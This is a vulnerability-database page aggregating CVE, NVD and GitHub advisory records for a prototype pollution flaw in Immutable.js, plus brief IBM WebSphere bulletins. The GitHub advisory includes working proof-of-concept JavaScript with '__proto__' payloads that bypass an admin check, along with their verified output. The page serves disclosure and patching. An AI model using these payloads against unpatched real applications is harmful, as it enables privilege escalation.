Vulnerability-Lookup

CVE-2026-29063 (GCVE-0-2026-29063)

Vulnerability from cvelistv5 – Published: 2026-03-06 18:25 – Updated: 2026-03-06 19:33

Title

Immutable.js: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable

Summary

Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/immutable-js/immutable-js/secu…	x_refsource_CONFIRM
	https://github.com/immutable-js/immutable-js/rele…	x_refsource_MISC
	https://github.com/immutable-js/immutable-js/rele…	x_refsource_MISC
	https://github.com/immutable-js/immutable-js/rele…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	immutable-js	immutable-js	Affected: < 3.8.3 Affected: < 4.3.7 Affected: < 5.1.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-29063",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-06T19:32:37.694711Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-06T19:33:31.642Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "immutable-js",
          "vendor": "immutable-js",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.8.3"
            },
            {
              "status": "affected",
              "version": "\u003c 4.3.7"
            },
            {
              "status": "affected",
              "version": "\u003c 5.1.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-06T18:25:22.438Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
        },
        {
          "name": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
        },
        {
          "name": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
        },
        {
          "name": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
        }
      ],
      "source": {
        "advisory": "GHSA-wf6x-7x77-mvgw",
        "discovery": "UNKNOWN"
      },
      "title": "Immutable.js: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in immutable"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29063",
    "datePublished": "2026-03-06T18:25:22.438Z",
    "dateReserved": "2026-03-03T20:51:43.481Z",
    "dateUpdated": "2026-03-06T19:33:31.642Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-29063\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-06T19:16:21.557\",\"lastModified\":\"2026-03-09T13:35:34.633\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29063\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-06T19:32:37.694711Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-06T19:32:46.434Z\"}}], \"cna\": {\"title\": \"Immutable.js: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in immutable\", \"source\": {\"advisory\": \"GHSA-wf6x-7x77-mvgw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"immutable-js\", \"product\": \"immutable-js\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.8.3\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.3.7\"}, {\"status\": \"affected\", \"version\": \"\u003c 5.1.5\"}]}], \"references\": [{\"url\": \"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\", \"name\": \"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-06T18:25:22.438Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-29063\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-06T19:33:31.642Z\", \"dateReserved\": \"2026-03-03T20:51:43.481Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-06T18:25:22.438Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

CERTFR-2026-AVI-0372

Vulnerability from certfr_avis - Published: 2026-03-27 - Updated: 2026-03-27

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

L'éditeur indique que les versions correctives suivantes seront mises à disposition ultérieurement : - WebSphere Application Server - Liberty 26.0.0.4 (deuxième trimestre 2026)

Impacted products

Vendor	Product	Description
IBM	WebSphere	WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de sécurité
IBM	WebSphere	WebSphere Application Server - Liberty sans le correctif APAR PH70510
IBM	Sterling Connect:Direct	Sterling Connect:Direct pour UNIX versions 6.4.x antérieures à 6.4.0.5
IBM	WebSphere	WebSphere eXtreme Scale versions 8.6.1.x antérieures à 8.6.1.6 sans le correctif APAR PH70422
IBM	Security QRadar Log Management AQL	greffon Security QRadar Log Management AQL versions 1.x antérieures à 1.1.4
IBM	Sterling Connect:Direct	Sterling Connect:Direct pour UNIX versions 6.3.x antérieures à 6.3.0.7
IBM	Sterling Connect:Direct	Sterling Connect:Direct FTP+ versions 1.3.0.x antérieures à 1.3.0.4

References

Title

Publication Time

GHSA-WF6X-7X77-MVGW

Vulnerability from github – Published: 2026-03-04 21:28 – Updated: 2026-03-06 22:51

Summary

Immutable is vulnerable to Prototype Pollution

Details

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

API	Notes
`mergeDeep(target, source)`	Iterates source keys via `ObjectSeq`, assigns `merged[key]`
`mergeDeepWith(merger, target, source)`	Same code path
`merge(target, source)`	Shallow variant, same assignment logic
`Map.toJS()`	`object[k] = v` in `toObject()` with no `__proto__` guard
`Map.toObject()`	Same `toObject()` implementation
`Map.mergeDeep(source)`	When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

major version	patched version
3.x	3.8.3
4.x	4.3.7
5.x	5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4

// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
  '{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);

const merged = mergeDeep(userProfile, requestBody);

console.log("merged.name:", merged.name); // Eve   (updated correctly)
console.log("merged.role:", merged.role); // user  (own property wins)
console.log("merged.admin:", merged.admin); // true  ← INJECTED via __proto__!

// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true  ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)

// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");

const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');

// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true

// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true

// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true

// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true

// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true

// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true

// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined  ← global Object.prototype NOT polluted

References

Are there any links users can visit to find out more?

JavaScript prototype pollution

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "immutable"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-rc.1"
            },
            {
              "fixed": "4.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "immutable"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "immutable"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T21:28:06Z",
    "nvd_published_at": "2026-03-06T19:16:21Z",
    "severity": "HIGH"
  },
  "details": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API                                     | Notes                                                       |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)`              | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)`  | Same code path                                              |\n| `merge(target, source)`                    | Shallow variant, same assignment logic                      |\n| `Map.toJS()`                              | `object[k] = v` in `toObject()` with no `__proto__` guard   |\n| `Map.toObject()`                            | Same `toObject()` implementation                            |\n| `Map.mergeDeep(source)`                  | When source is converted to plain object                    |\n\n\n\n## Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 \u2014 mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n  \u0027{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}\u0027,\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve   (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user  (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true  \u2190 INJECTED via __proto__!\n\n// Common security checks \u2014 both bypassed:\nconst isAdminByFlag = (u) =\u003e u.admin === true;\nconst isAdminByRole = (u) =\u003e u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true  \u2190 BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user wins)\n\n// Stealthy: Object.keys() hides \u0027admin\u0027\nconsole.log(\"Object.keys:\", Object.keys(merged)); // [\u0027id\u0027, \u0027name\u0027, \u0027role\u0027]\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 \u2014 All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse(\u0027{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}\u0027);\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) =\u003e b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse(\u0027{\"profile\":{\"__proto__\":{\"admin\":true}}}\u0027);\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined  \u2190 global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)",
  "id": "GHSA-wf6x-7x77-mvgw",
  "modified": "2026-03-06T22:51:31Z",
  "published": "2026-03-04T21:28:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/issues/2178"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/commit/16b3313fdf2c5f579f10799e22869f6909abf945"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/commit/6e2cf1cfe6137e72dfa48fc2cfa8f4d399d113f9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/immutable-js/immutable-js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Immutable is vulnerable to Prototype Pollution"
}

FKIE_CVE-2026-29063

Vulnerability from fkie_nvd - Published: 2026-03-06 19:16 - Updated: 2026-03-09 13:35

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3
	security-advisories@github.com	https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8
	security-advisories@github.com	https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5
	security-advisories@github.com	https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5."
    },
    {
      "lang": "es",
      "value": "Immutable.js proporciona muchas estructuras de datos inmutables persistentes. Antes de las versiones 3.8.3, 4.3.7 y 5.1.5, la contaminaci\u00f3n de prototipos es posible en immutable a trav\u00e9s de las APIs mergeDeep(), mergeDeepWith(), merge(), Map.toJS() y Map.toObject(). Este problema ha sido parcheado en las versiones 3.8.3, 4.3.7 y 5.1.5."
    }
  ],
  "id": "CVE-2026-29063",
  "lastModified": "2026-03-09T13:35:34.633",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-06T19:16:21.557",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

WID-SEC-W-2026-0845

Vulnerability from csaf_certbund - Published: 2026-03-24 23:00 - Updated: 2026-03-25 23:00

Summary

IBM WebSphere Application Server Liberty: Mehrere Schwachstellen

Severity

Mittel

Notes

